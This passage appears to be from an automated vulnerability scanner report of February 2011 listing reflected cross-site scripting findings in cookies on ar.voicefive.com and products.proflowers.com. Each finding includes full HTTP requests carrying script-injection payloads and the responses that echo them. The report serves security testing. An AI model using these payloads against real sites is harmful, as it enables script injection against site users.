Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; UID=1d29d89e-72.246.30.75-1294456810f15f0<script>alert(1)</script>04bbaea526f

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:24:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 19861

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
e);
}else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Buddy.cookies={ "UID": '1d29d89e-72.246.30.75-1294456810f15f0<script>alert(1)</script>04bbaea526f', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb
...[SNIP]...

2.110. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_da39f516a098b3de) ar_p68511049 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node_hulu.pli

Issue detail

The value of the ar_da39f516a098b3de&#41; ar_p68511049 cookie is copied into the HTML document as plain text between tags. The payload 283c1<script>alert(1)</script>01785e5a65 was submitted in the ar_da39f516a098b3de&#41; ar_p68511049 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node_hulu.pli HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hulu.com/plus?src=topnav
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&283c1<script>alert(1)</script>01785e5a65; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:24:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 19860

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p68511049": 'exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&283c1<script>alert(1)</script>01785e5a65' };
COMSCORE.BMX.Buddy.ServerTimeEpoch="1297448662";COMSCORE.BMX.Buddy.start(({"Config":{"ControlList":[{Pid:"p75771577",RecruitFrequency:0,Inv:"inv_hulu",Version:3},{Pid:"p72205782",RecruitFrequency
...[SNIP]...

2.111. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_p45555483 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node_hulu.pli

Issue detail

The value of the ar_p45555483 cookie is copied into the HTML document as plain text between tags. The payload 8d44c<script>alert(1)</script>06dfc11ec34 was submitted in the ar_p45555483 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node_hulu.pli HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hulu.com/plus?src=topnav
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&8d44c<script>alert(1)</script>06dfc11ec34; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:24:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 19861

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
d Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&8d44c<script>alert(1)</script>06dfc11ec34', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p68511049": 'exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:0
...[SNIP]...

2.112. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_p67161473 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node_hulu.pli

Issue detail

The value of the ar_p67161473 cookie is copied into the HTML document as plain text between tags. The payload 35e21<script>alert(1)</script>82f3b1aaf6d was submitted in the ar_p67161473 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node_hulu.pli HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hulu.com/plus?src=topnav
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&35e21<script>alert(1)</script>82f3b1aaf6d; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:24:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 19861

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
)();}COMSCORE.BMX.Buddy.cookies={ "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&35e21<script>alert(1)</script>82f3b1aaf6d', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:
...[SNIP]...

2.113. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_p83612734 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node_hulu.pli

Issue detail

The value of the ar_p83612734 cookie is copied into the HTML document as plain text between tags. The payload 60c44<script>alert(1)</script>36b26e72378 was submitted in the ar_p83612734 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node_hulu.pli HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hulu.com/plus?src=topnav
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&60c44<script>alert(1)</script>36b26e72378; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:24:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 19861

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
t Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&60c44<script>alert(1)</script>36b26e72378', "ar_p68511049": 'exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&' };
COMSCORE.BMX.Buddy.ServerTimeEpoch="1297448662";COMSCORE.BMX.Buddy.start((
...[SNIP]...

2.114. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_p85001580 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node_hulu.pli

Issue detail

The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload 288b0<script>alert(1)</script>4b2f2492765 was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node_hulu.pli HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hulu.com/plus?src=topnav
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&288b0<script>alert(1)</script>4b2f2492765; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:24:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 19861

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
011&prad=55352400&cpn=4&arc=38899481&', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&288b0<script>alert(1)</script>4b2f2492765', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5
...[SNIP]...

2.115. http://products.proflowers.com/flowers/15-Sweetheart-Tulips-with-Chocolates-30007882 [PFC_BrowserId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/15-Sweetheart-Tulips-with-Chocolates-30007882

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36625</script><script>alert(1)</script>aaeb634691b was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /flowers/15-Sweetheart-Tulips-with-Chocolates-30007882 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f36625</script><script>alert(1)</script>aaeb634691b; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?30007882&2/11/2011 2:36:43 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:36:43 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:36:43 GMT
Connection: close
Content-Length: 150824


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
t="Product";
resx.links="30007882;42954;41213;30043943;30050119;";
resx.itemid = "30007882";
resx.qty="1";
resx.price="19.99";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84f36625</script><script>alert(1)</script>aaeb634691b";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx.cv
...[SNIP]...

2.116. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [PFC_BrowserId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/18-Red-Roses-30050119

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48ef4</script><script>alert(1)</script>fc8f59adbce was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=xsbbevdz1a3ssdqbzxeccj03; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:32:14 AM; PRVD=SiteSplitID=72; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f48ef4</script><script>alert(1)</script>fc8f59adbce; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253APortals%25253AHIC%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/18-Red-Roses-30050119%25253Fviewpos%25253D2%252526trackingpgroup%25253DHIC%252526ref%25253Dfgvprt%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:41:57 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:41:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:41:57 GMT
Content-Length: 164424


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

resx.links="30050119;30007363;30048203;30049945;41213;30043943;";
resx.itemid = "30050119";
resx.qty="1";
resx.price="29.99";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84f48ef4</script><script>alert(1)</script>fc8f59adbce";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "HIC";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx
...[SNIP]...

2.117. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [PFC_BrowserId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/20-Sweetheart-Tulips-30007357

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59bff</script><script>alert(1)</script>8b3e455c6b7 was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /flowers/20-Sweetheart-Tulips-30007357?viewpos=1&trackingpgroup=HPM&tile=hmpg_podB&Ref=HomeNoRef&PageSplit= HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
